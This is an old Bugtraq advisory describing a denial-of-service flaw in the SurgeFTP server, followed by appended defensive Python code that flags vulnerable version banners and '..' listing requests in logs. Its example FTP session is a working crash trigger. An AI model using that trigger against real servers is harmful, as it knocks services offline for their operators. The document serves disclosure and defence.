Date: Thu, 1 Mar 2001 00:16:53 +0100
From: SNS Research <vuln-dev@GREYHACK.COM>
Subject: SurgeFTP Denial of Service
To: BUGTRAQ@SECURITYFOCUS.COM

Strumpf Noir Society Advisories
! Public release !   <--#

-= SurgeFTP Denial of Service =-

Release date: Thursday, March 1, 2001

Introduction:

NetWin's SurgeFTP is an easy-to-manage and reliable FTP server with detailed reporting and easy-to-use management features. SurgeFTP is available for both the Unix/Linux and Windows flavours of operating systems from the vendor's site: http://www.netwinsite.com

Problem:

Due to a design issue in the SurgeFTP server, a denial of service condition exists which could allow any user with local or shell access to the host to crash the server. The problem resides in the local handling of the directory listing command: once a listing has been successfully initialized, the server dies if it is followed by a "malformed" request.

Example:

# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
ftp> ls /
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer (..)

Solution:

The vendor has been notified and has verified the problem. Build v1.1h has been released, which fixes this issue. It is available from ftp://ftp.netwinsite.com/pub/surgeftp/

yadayadayada

Free sk8! (http://www.freesk8.org)

SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html) compliant; all information is provided on an AS IS basis.

EOF, but Strumpf Noir Society will return!
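Two checks an administrator might run in response to this advisory, as an added example that is not part of the original post or NetWin's code: one that reads the SurgeFTP greeting banner and decides whether the announced build predates the fixed v1.1h, and one that scans FTP command logs for listing requests whose argument climbs above the virtual root (the ".." trigger shown above). The log line format and the sample lines are constructed assumptions; the only page-derived values are the banner shape and the fixed version.

```python
import re
from typing import List, Optional, Tuple

# Build in which the vendor fixed the issue, per the advisory.
FIXED_VERSION = "1.1h"

# Greeting as shown in the advisory: "220 SurgeFTP <host> (Version 1.0b)"
BANNER_RE = re.compile(r"^220 SurgeFTP \S+ \(Version (?P<ver>\d+\.\d+[a-z]?)\)")


def parse_version(ver: str) -> Tuple[int, int, str]:
    """Split a SurgeFTP version such as '1.0b' into comparable parts.
    A missing letter suffix sorts before 'a' (assumed ordering)."""
    m = re.fullmatch(r"(\d+)\.(\d+)([a-z]?)", ver)
    if not m:
        raise ValueError(f"unrecognised version: {ver!r}")
    return int(m.group(1)), int(m.group(2)), m.group(3)


def is_vulnerable_banner(banner: str) -> Optional[bool]:
    """True if the banner announces a build older than the fixed one,
    False if fixed or newer, None if the banner is not SurgeFTP's."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    return parse_version(m.group("ver")) < parse_version(FIXED_VERSION)


def escapes_root(path: str) -> bool:
    """True if a listing argument climbs above '/' through '..' components."""
    depth = 0
    for part in path.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part not in ("", "."):
            depth += 1
    return False


def flag_traversal_listings(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (line, argument) for LIST/NLST commands that escape the root.
    Assumed (constructed) log format: '<client> <COMMAND> [argument]'."""
    hits = []
    for line in log_lines:
        parts = line.split(maxsplit=2)
        if len(parts) >= 2 and parts[1].upper() in ("LIST", "NLST"):
            arg = parts[2] if len(parts) == 3 else ""
            if escapes_root(arg):
                hits.append((line, arg))
    return hits


# Constructed sample log: the second and fourth lines mirror the "ls .." step.
SAMPLE_LOG = [
    "10.0.0.5 NLST /",
    "10.0.0.5 NLST ..",
    "10.0.0.9 LIST pub/..",
    "10.0.0.9 LIST /..",
]
```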